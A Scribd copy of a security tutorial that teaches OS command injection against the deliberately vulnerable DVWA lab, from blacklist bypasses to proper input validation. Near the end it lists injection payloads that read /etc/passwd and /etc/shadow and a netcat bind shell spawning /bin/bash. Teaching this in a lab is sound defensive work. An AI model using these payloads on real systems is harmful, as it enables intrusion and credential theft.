Scribd
Upload
36 views10 pages

Command Injection - Security Tutorials

Command injection is a security vulnerability that allows attackers to execute arbitrary commands on a host operating system through a vulnerable web application. This occurs when user-supplied data is not properly validated, enabling the use of metacharacters to manipulate command execution. The document provides examples of testing for command injection using the Damn Vulnerable Web Application (DVWA) and discusses various metacharacters that can be employed in such attacks.

Uploaded by

Alejandro Andres Garrido Aranda
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
36 views10 pages

Command Injection - Security Tutorials

Command injection is a security vulnerability that allows attackers to execute arbitrary commands on a host operating system through a vulnerable web application. This occurs when user-supplied data is not properly validated, enabling the use of metacharacters to manipulate command execution. The document provides examples of testing for command injection using the Damn Vulnerable Web Application (DVWA) and discusses various metacharacters that can be employed in such attacks.

Uploaded by

Alejandro Andres Garrido Aranda
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Command Injection - Security Tutorials https://securitytutorials.co.

uk/command-injection/

Command Injection Search …

CATEGORIES

◦ Expliots & Pentesting


◦ General Admin Tasks
Command injection also is known as OS Command injection, ◦ Hacking Basics
is an attack technique used to execute commands on a host ◦ Hacking Wireless Networks
operating system via a vulnerable web application. ◦ Networking
Command Injection attacks are possible when an application ◦ Raspberry Pi
passes unsafe user-supplied data (forms, cookies, HTTP
headers, and so on) to a system shell. These commands are
executed with the privileges of the vulnerable application. ARCHIVES
These attacks are due to the web application not having
su�cient input validation on the command being run. Select Month

POPULAR TUTORIALS

◦ HTTP Header Internal IP


Disclosure

◦ Brute Forcing Passwords


with THC-Hydra

1 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

◦ Brute Forcing Web Logins


with DVWA

◦ Scanning and Port


Forwarding through a
Meterpreter Session

◦ Top 10 Security YouTube


Channels

◦ Installing Kali Linux in


VirtualBox

To test for command Injection you use Metacharacters to


string commands together just like you can from the
MISSION STATEMENT
terminal or command prompt

Security Tutorials Mission is to


for example, type this into a Linux terminal:
create clear up to date
tutorials on hacking, cyber
security, PCI Compliance.
ping -c 4 127.0.0.1 && ls

Please Subscribe to Security


Tutorials to receive
Adding && between these commands runs the ls command
noti�cations of new tutorials
if the preceding ping command is successful.
as they are released.

There are a whole bunch of other Metacharacters you can


use, some of the more common ones I have listed below.

MetaCharacters

• ; The semicolon is the most common metacharacter used


to test an injection �aw. The shell will run all the
commands in sequence separated by the semicolon.
• & Separate multiple commands on one command line. It
runs the �rst command then the second command.

2 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

• && Runs the command following && only if the preceding


command is successful.
• | The Pipe, pipes the output of the �rst command into the
second command.
• || Redirects the standard outputs of the �rst command to
standard input of the second command.
• ‘ The quote is used to force the shell to interpret and run
commands between backticks. Following is an example of
this command: Variable=”OS version ‘uname -a'” && echo
$variable.
• () The brackets are used to nest commands.
• # The Hash is used as a command line comment.

Command injection With DVWA

DVWA stands for Damn Vulnerable Web Application and if


you don’t already have DVWA installed and not checked out
my tutorial on setting up a vulnerable Web Server check that
out here.

login into DVWA and start o� by putting the DVWA Security


down to low and click submit.

3 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Now select the Command Injection button and you should


be presented with a page that says ‘ping a device’ and gives
you a box to enter an IP address. enter any IP address and it
will ping that address.

If we take a look at the source by clicking the view source


button in the bottom right-hand corner of DVWA, we can see
what the Application is doing in the background.

4 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Once you have clicked the view source you will be presented
with a new window displaying the PHP code above, which the
DVWA team have really nicely commented for us.

Basically, the program takes our input in the form of an IP


address then determines what the backend Operating
system is (windows or Linux) then runs the appropriate ping
command, It then echoes back the output of the command
into the web application

As the web application interacts with the backend Operating


system and is not sanitizing our input, we can introduce
MetaCharactors to string extra commands, allowing us to
break out of its intended ping command and run our own
commands directly on the backend operating system.

5 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Add the Metacharacter && after your IP address, this allows


you to string the second command onto the �rst and will run
as long as the �rst command is successful, as I know the
backend operating system (in this case) is Linux, I

try ls -la to list all the directories the web application is


running in.

After running the command you can see the ping command
run and then the ls command listing all the directories
where the web application is running.

Security Level Medium

Switch the Security level up to medium and try the command


again from security level Low.

127.0.0.1&&ls -la

notice the command runs �ne with just the IP address but as
soon as you add the metacharacter ( && ) and your injected
command it does not output anything and reloads the page.

If you take a look at the source you can see the programmer

6 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

has modi�ed his code from security level low adding a


blacklist blocking two metacharacters being added to the
input && and ;.

Lucky for us there are plenty of other metacharacters to try.

Changing the metacharacter to a single & or any other that


is not on the blacklist, still allows us to inject our command.

Security Level High

Now Increase the security level of DVWA to High, then


notice using the same command from Security level medium
above now no longer works.

7 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Now let’s open up the source code and take a look at what
changes have been made.

It looks like the programmer has extended the


metacharacters which are blacklisted in the web application.

But all is not lost, notice the highlighted area in the blacklist
above, there is an error in the syntax, the programmer has
added an extra space after the | (pipe) Metacharacter and
the backtick. This means we should still be able to use
command injection as long as we don’t put any spaces in our
command and use the pipe like this.

8 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

This shows that even though the programmer has made a


thorough blacklist one little extra space still lets us inject
our commands into the web application.

Security Level Impossible

On Security level Impossible this is how it should be done. If


we �rst take a look at the source we can see what changes
have been made to the program.

As you can see from the commented Code above the


programmer has got rid of the Blacklist altogether and is
now instead validating the user’s input, anything other then
an IP address gives the error message “You have entered an
invalid IP”.

Things to Try yourself

If you have also installed Mutillidea and bWAPP from my

9 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

setting up a vulnerable LAMP Server tutorial, Have a go at


the command injection section of these.

Remember any command you can run in the terminal you


can run after a command injection, you don’t have to just use
ls as I have in my examples, try some of these.

127.0.0.1|whoami shows you the user the web application is


currently running as.

127.0.0.1|uname -a shows the Operating System version


the web server is running.

127.0.0.1&&ifcon�g shows you all the network


con�guration information.

127.0.0.1&&php -v Gives you PHP version running on web


applications server.

127.0.0.1&&cat /etc/passwd displays all the users on the


backend Linux Server

127.0.0.1&&/etc/shadow displays all hashed passwords but


only if you are running with root privileges.

NetCat Remote Shell

If NetCat (nc) is installed on your vulnerable web server and


it has the -e option, you should be able to create a remote
shell like so.

127.0.0.1&&nc -lp 31337 -e /bin/bash

Then from your pc connect to this listener by typing using


the webservers IP address.

10 of 14 11/17/2022, 11:46 AM

You might also like